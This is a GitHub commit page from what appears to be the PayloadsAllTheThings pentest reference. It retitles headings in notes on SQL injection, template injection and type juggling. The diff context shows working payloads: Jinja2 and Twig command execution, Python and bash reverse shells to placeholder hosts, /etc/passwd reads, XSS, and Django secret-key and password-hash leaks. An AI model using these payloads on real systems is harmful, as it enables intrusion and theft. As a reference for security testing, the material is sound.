Skip to content

Commit

Permalink
XPATH + XSS + XXE + XSLT
Browse files Browse the repository at this point in the history
  • Loading branch information
swisskyrepo committed Nov 30, 2024
1 parent 8c09568 commit 32d9f75
Show file tree
Hide file tree
Showing 15 changed files with 234 additions and 200 deletions.
8 changes: 4 additions & 4 deletions SQL Injection/Cassandra Injection.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,8 +6,8 @@
## Summary

* [CQL Injection Limitations](#cql-injection-limitations)
* [Cassandra comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass)
* [Cassandra Comment](#cassandra-comment)
* [Cassandra Login Bypass](#cassandra-login-bypass)
* [Example #1](#example-1)
* [Example #2](#example-2)
* [References](#references)
Expand All @@ -26,14 +26,14 @@
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.


## Cassandra comment
## Cassandra Comment

```sql
/* Cassandra Comment */
```


## Cassandra - Login Bypass
## Cassandra Login Bypass

### Example #1

Expand Down
1 change: 0 additions & 1 deletion SQL Injection/DB2 Injection.md
Original file line number Diff line number Diff line change
Expand Up @@ -54,7 +54,6 @@

## DB2 Methodology


| Description | SQL Query |
| ---------------- | ------------------------------------ |
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |
Expand Down
8 changes: 4 additions & 4 deletions Server Side Template Injection/ASP.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,8 +6,8 @@
## Summary

- [ASP.NET Razor](#aspnet-razor)
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
- [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection)
- [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution)
- [References](#references)


Expand All @@ -18,13 +18,13 @@
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.

### ASP.NET Razor - Basic injection
### ASP.NET Razor - Basic Injection

```powershell
@(1+2)
```

### ASP.NET Razor - Command execution
### ASP.NET Razor - Command Execution

```csharp
@{
Expand Down
20 changes: 10 additions & 10 deletions Server Side Template Injection/PHP.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,13 +8,13 @@
- [Templating Libraries](#templating-libraries)
- [Smarty](#smarty)
- [Twig](#twig)
- [Twig - Basic injection](#twig---basic-injection)
- [Twig - Template format](#twig---template-format)
- [Twig - Basic Injection](#twig---basic-injection)
- [Twig - Template Format](#twig---template-format)
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
- [Twig - Code execution](#twig---code-execution)
- [Twig - Code Execution](#twig---code-execution)
- [Latte](#latte)
- [Latte - Basic injection](#latte---basic-injection)
- [Latte - Code execution](#latte---code-execution)
- [Latte - Basic Injection](#latte---basic-injection)
- [Latte - Code Execution](#latte---code-execution)
- [patTemplate](#pattemplate)
- [PHPlib](#phplib-and-html_template_phplib)
- [Plates](#plates)
Expand Down Expand Up @@ -53,7 +53,7 @@
[Official website](https://twig.symfony.com/)
> Twig is a modern template engine for PHP.
### Twig - Basic injection
### Twig - Basic Injection

```python
{{7*7}}
Expand All @@ -63,7 +63,7 @@
{{app.request.server.all|join(',')}}
```

### Twig - Template format
### Twig - Template Format

```python
$output = $twig > render (
Expand All @@ -84,7 +84,7 @@ $output = $twig > render (
{{include("wp-config.php")}}
```

### Twig - Code execution
### Twig - Code Execution

```python
{{self}}
Expand Down Expand Up @@ -118,13 +118,13 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld

## Latte

### Latte - Basic injection
### Latte - Basic Injection

```php
{var $X="POC"}{$X}
```

### Latte - Code execution
### Latte - Code Execution

```php
{php system('nslookup oastify.com')}
Expand Down
72 changes: 36 additions & 36 deletions Server Side Template Injection/Python.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,29 +7,29 @@

- [Templating Libraries](#templating-libraries)
- [Django](#django)
- [Django - Basic injection](#django---basic-injection)
- [Django - Cross-site scripting](#django---cross-site-scripting)
- [Django - Debug information leak](#django---debug-information-leak)
- [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key)
- [Django - Basic Injection](#django---basic-injection)
- [Django - Cross-Site Scripting](#django---cross-site-scripting)
- [Django - Debug Information Leak](#django---debug-information-leak)
- [Django - Leaking App's Secret Key](#django---leaking-apps-secret-key)
- [Django - Admin Site URL leak](#django---admin-site-url-leak)
- [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak)
- [Django - Admin Username and Password Hash Leak](#django---admin-username-and-password-hash-leak)
- [Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format)
- [Jinja2 - Basic Injection](#jinja2---basic-injection)
- [Jinja2 - Template Format](#jinja2---template-format)
- [Jinja2 - Debug Statement](#jinja2---debug-statement)
- [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes)
- [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables)
- [Jinja2 - Read remote file](#jinja2---read-remote-file)
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
- [Jinja2 - Dump All Used Classes](#jinja2---dump-all-used-classes)
- [Jinja2 - Dump All Config Variables](#jinja2---dump-all-config-variables)
- [Jinja2 - Read Remote File](#jinja2---read-remote-file)
- [Jinja2 - Write Into Remote File](#jinja2---write-into-remote-file)
- [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
- [Jinja2 - Filter bypass](#jinja2---filter-bypass)
- [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit The SSTI By Calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
- [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file)
- [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
- [Tornado](#tornado)
- [Tornado - Basic injection](#tornado---basic-injection)
- [Tornado - Basic Injection](#tornado---basic-injection)
- [Tornado - Remote Command Execution](#tornado---remote-command-execution)
- [Mako](#mako)
- [Mako - Remote Command Execution](#mako---remote-command-execution)
Expand All @@ -54,7 +54,7 @@

Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.

### Django - Basic injection
### Django - Basic Injection

```python
{% csrf_token %} # Causes error with Jinja2
Expand All @@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
```


### Django - Cross-site scripting
### Django - Cross-Site Scripting

```python
{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}
```

### Django - Debug information leak
### Django - Debug Information Leak

```python
{% debug %}
```

### Django - Leaking app’s Secret Key
### Django - Leaking App's Secret Key

```python
{{ messages.storages.0.signer.key }}
Expand All @@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
{% include 'admin/base.html' %}
```

### Django - Admin username and password hash leak
### Django - Admin Username And Password Hash Leak


```
Expand All @@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
[Official website](https://jinja.palletsprojects.com/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
### Jinja2 - Basic injection
### Jinja2 - Basic Injection

```python
{{4*4}}[[5*5]]
Expand All @@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on a Flask application.

### Jinja2 - Template format
### Jinja2 - Template Format

```python
{% extends "layout.html" %}
Expand All @@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump

Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement

### Jinja2 - Dump all used classes
### Jinja2 - Dump All Used Classes

```python
{{ [].class.base.subclasses() }}
Expand All @@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
{{ self.__init__.__globals__.__builtins__ }}
```

### Jinja2 - Dump all config variables
### Jinja2 - Dump All Config Variables

```python
{% for key, value in config.iteritems() %}
Expand All @@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
{% endfor %}
```

### Jinja2 - Read remote file
### Jinja2 - Read Remote File

```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
Expand All @@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
```

### Jinja2 - Write into remote file
### Jinja2 - Write Into Remote File

```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
Expand All @@ -186,7 +186,7 @@ Listen for connection
nc -lnvp 8000
```

#### Jinja2 - Forcing output on blind RCE
#### Jinja2 - Forcing Output On Blind RCE

You can import Flask functions to return an output from the vulnerable page.

Expand All @@ -203,7 +203,7 @@ def hook(*args, **kwargs):
```


#### Exploit the SSTI by calling os.popen().read()
#### Exploit The SSTI By Calling os.popen().read()

```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
Expand Down Expand Up @@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa

Source: https://twitter.com/podalirius_/status/1655970628648697860

#### Exploit the SSTI by calling subprocess.Popen
#### Exploit The SSTI By Calling subprocess.Popen

:warning: the number 396 will vary depending of the application.

Expand All @@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
```

#### Exploit the SSTI by calling Popen without guessing the offset
#### Exploit The SSTI By Calling Popen Without Guessing The Offset

```python
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
Expand All @@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
```

#### Exploit the SSTI by writing an evil config file.
#### Exploit The SSTI By Writing An Evil Config File

```python
# evil config
Expand All @@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```

### Jinja2 - Filter bypass
### Jinja2 - Filter Bypass

```python
request.__class__
Expand Down Expand Up @@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http

## Tornado

### Tornado - Basic injection
### Tornado - Basic Injection

```py
{{7*7}}
Expand Down
10 changes: 5 additions & 5 deletions Type Juggling/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,8 +6,8 @@
## Summary

* [Loose Comparison](#loose-comparison)
* [True statements](#true-statements)
* [NULL statements](#null-statements)
* [True Statements](#true-statements)
* [NULL Statements](#null-statements)
* [Loose Comparison](#loose-comparison)
* [Magic Hashes](#magic-hashes)
* [Methodology](#methodology)
Expand All @@ -22,7 +22,7 @@
- **Loose** comparison: using `== or !=` : both variables have "the same value".
- **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".

### True statements
### True Statements

| Statement | Output |
| --------------------------------- |:---------------:|
Expand All @@ -44,7 +44,7 @@
![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)

Loose Type Comparisons occurs in many languages:
Loose Type comparisons occurs in many languages:

* [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
* [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
Expand All @@ -56,7 +56,7 @@ Loose Type Comparisons occurs in many languages:
* [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)


### NULL statements
### NULL Statements

| Function | Statement | Output |
| -------- | -------------------------- |:---------------:|
Expand Down
Loading

0 comments on commit 32d9f75

Please sign in to comment.